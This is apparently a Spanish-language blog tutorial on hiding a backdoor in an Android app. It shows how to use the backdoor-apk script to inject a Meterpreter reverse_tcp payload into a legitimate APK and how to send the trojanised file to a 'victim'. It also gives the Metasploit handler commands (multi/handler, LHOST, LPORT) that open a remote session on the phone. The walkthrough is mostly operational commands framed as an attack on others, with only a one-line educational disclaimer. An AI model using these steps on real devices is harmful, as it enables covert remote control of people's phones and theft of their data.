Hackear Teléfono Android con Backdoor APK
Hackear Teléfono Android con Backdoor APK

Hackear Teléfono Android con Backdoor APK

A veces, en el hacking, tenemos que usar la forma más genuina para que la víctima sea seguramente hackeada. Estas formas genuinas se deben utilizar para nuestra ventaja. Una de las formas más genuinas de hackear un dispositivo Android es vincular el archivo original de una aplicación Android a su backdoor-APK. Este backdoor-apk es un software que nos ayuda a vincular el archivo apk original con tu propio virus. Por lo tanto, retira todo lo sospechoso de ti.

Puedes ver una demostración de lo que puedes lograr con el vídeo a continuación:

backdoor-apk es un script de shell que simplifica el proceso de agregar una puerta trasera a cualquier archivo APK de Android.

@dana-at-cp

Backdoor-apk: Un caballo de Troya

Esta herramienta es una automatización del artículo Incrustar Meterpreter en cualquier Android APK.

Y para esto primero debes ejecutar el siguiente comando: (requerimientos necesarios)

apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Instalar lib32stdc++6 en Linux
Instalar lib32stdc++6 en Linux

Una vez que el comando se ejecuta y se realiza la instalación, descarga el backdoor-apk de GitHub y para ello ejecuta lo siguiente:

git clone https://github.com/dana-at-cp/backdoor-apk.git
cd backdoor-apk/
cd backdoor-apk/
Instalar backdoor-apk
Instalar backdoor-apk

A medida que se descarga el software, dirígete al sitio web www.apk4fun.com y descarga un archivo APK original (en mi ejemplo probaré How to: Guía para Informáticos -recomiendo que pruebes con esta APP para comprobar que todo funcione bien) . Y luego cópialo en la carpeta backdoor-apk (Como ejemplo, el APK descargado lo he renombrado como EsGeeks).

Ábralo en la terminal y escribe:

./backdoor-apk.sh [nombre_app].apk
App Original y Backdoor APK
App Original y Backdoor APK

A medida que se ejecuta el comando, te pedirá la carga útil/payload que deseas usar y para eso selecciona 3 (meterpreter /reverse_tcp) y luego te pedirá LHOST y LPORT; aquí coloca tu IP local y un número de puerto (4444,5454,6565, o algo similar).

meterpreter reverse_tcp y backdoor Android hacking
meterpreter reverse_tcp y backdoor Android hacking

A continuación, nos pedirá seleccionar los permisos del archivo manifest de Android. Utilizaremos la opción 2 (puedes mantener los permisos del archivo original, si deseas). El programa debería finalizar con éxito, pero…

Failed to recompile original project with backdoor APK
Failed to recompile original project with backdoor APK

Obtenemos un error Failed to recompile original project with backdoor. Si tienes un error parecido puedes resolver usando la versión 2.3.3 de APKTool. Si esto no resuelve el problema o tienes otro similar, asegúrate que las siguientes herramientas se estén ejecutando en tu sistema (escribe cada una de ellas como un comando en la terminal)

#Archivo backdoor-apk.sh (línea 27 a 35)
MSFVENOM=msfvenom
BAKSMALI=baksmali
UNZIP=unzip
KEYTOOL=keytool
JARSIGNER=jarsigner
APKTOOL=apktool
ASO=third-party/android-string-obfuscator/lib/aso
DX=third-party/android-sdk-linux/build-tools/25.0.2/dx
ZIPALIGN=third-party/android-sdk-linux/build-tools/25.0.2/zipalign

A continuación, puedes ver que se generó con éxito un APK original con un “virus” incrustado. Aligning

Aligning recompiled APK done
Aligning recompiled APK done

Los comandos anteriores vincularán el archivo al archivo APK original y lo guardarán en la carpeta backdoorapk> original> dist.

Ahora todo lo que tienes que hacer es enviar el archivo a la víctima, ya que lo instalará haciendo clic en Siguiente .Y haga clic en Instalar para instalar la aplicación.

Instalar APK infectado con backdoor
Instalar APK infectado con backdoor

De esta manera se descargará la aplicación.

Hacking Dispositivo Android

Antes de abrir la aplicación, abre Metasploit escribiendo lo siguiente:

msfconsole
Abrir Metasploit con msfconsole
Abrir Metasploit con msfconsole

A continuación, ejecuta los siguientes comandos (colocarás el mismo LHOST y LPORT que utilizaste al generar el APK con backdoor)

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost [TU_IP]
set lport [PUERTO]
exploit
Exploit android con meterpreter reverse_tcp
Exploit android con meterpreter reverse_tcp

Después de esto cuando ejecutas la aplicación (la app en Android es abierta); obtendrás una sesión de meterpreter.

Sesión de meterpreter Android
Sesión de meterpreter Android

Por lo tanto, ya realizaste hacking a la víctima genuinamente!

sysinfo
app_list
Hacking Android con APK Metasploit
Hacking Android con APK Metasploit

Los usuarios de este script de shell deben tener conocimientos prácticos de Linux, Bash, Metasploit, Apktool, Android SDK, smali, etc. Este script de shell se proporciona tal cual, sin garantía de ningún tipo, y tiene fines educativos únicamente. ¡Deja tu reacción! 😉

Más artículos
Penetration Testing para Windows Detección de Intrusos
Penetration Testing para Windows: Detección de intrusos